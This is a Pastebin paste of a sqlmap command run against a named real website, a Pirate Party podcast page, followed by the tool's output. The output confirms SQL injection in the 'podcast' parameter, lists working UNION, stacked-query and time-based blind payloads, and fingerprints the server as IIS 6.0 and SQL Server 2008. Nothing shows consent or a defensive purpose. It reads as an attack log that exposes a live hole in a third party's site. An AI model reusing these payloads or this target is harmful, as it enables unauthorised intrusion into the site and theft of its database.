Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /sqlmap.py --risk=3 --level=5 -u http://kraehennest.piraten-wagen-mehr-demokratie.de/Startform.aspx?podcast=Kr%u00e4hennestSitzungen
- _
- ___ ___| |_____ ___ ___ {1.0-dev-6795b51}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 10:43:49
- [10:43:50] [INFO] resuming back-end DBMS 'microsoft sql server'
- [10:43:50] [INFO] testing connection to the target URL
- [10:43:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: podcast
- Type: UNION query
- Title: Generic UNION query (NULL) - 2 columns
- Payload: podcast=Kr%u00e4hennestSitzungen' UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(118)+CHAR(102)+CHAR(113)+CHAR(71)+CHAR(119)+CHAR(102)+CHAR(104)+CHAR(103)+CHAR(77)+CHAR(75)+CHAR(112)+CHAR(78)+CHAR(109)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(97)+CHAR(113)--
- Type: stacked queries
- Title: Microsoft SQL Server/Sybase stacked queries
- Payload: podcast=Kr%u00e4hennestSitzungen'; WAITFOR DELAY '0:0:5'--
- Type: AND/OR time-based blind
- Title: Microsoft SQL Server/Sybase time-based blind
- Payload: podcast=Kr%u00e4hennestSitzungen' WAITFOR DELAY '0:0:5'--
- ---
- [10:43:51] [INFO] the back-end DBMS is Microsoft SQL Server
- web server operating system: Windows 2003 or XP
- web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
- back-end DBMS: Microsoft SQL Server 2008
- [10:43:51] [WARNING] HTTP error codes detected during run:
- 500 (Internal Server Error) - 1 times
- [10:43:51] [INFO] fetched data logged to text files under '/home/darksider3/.sqlmap/output/kraehennest.piraten-wagen-mehr-demokratie.de'
- [*] shutting down at 10:43:51
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement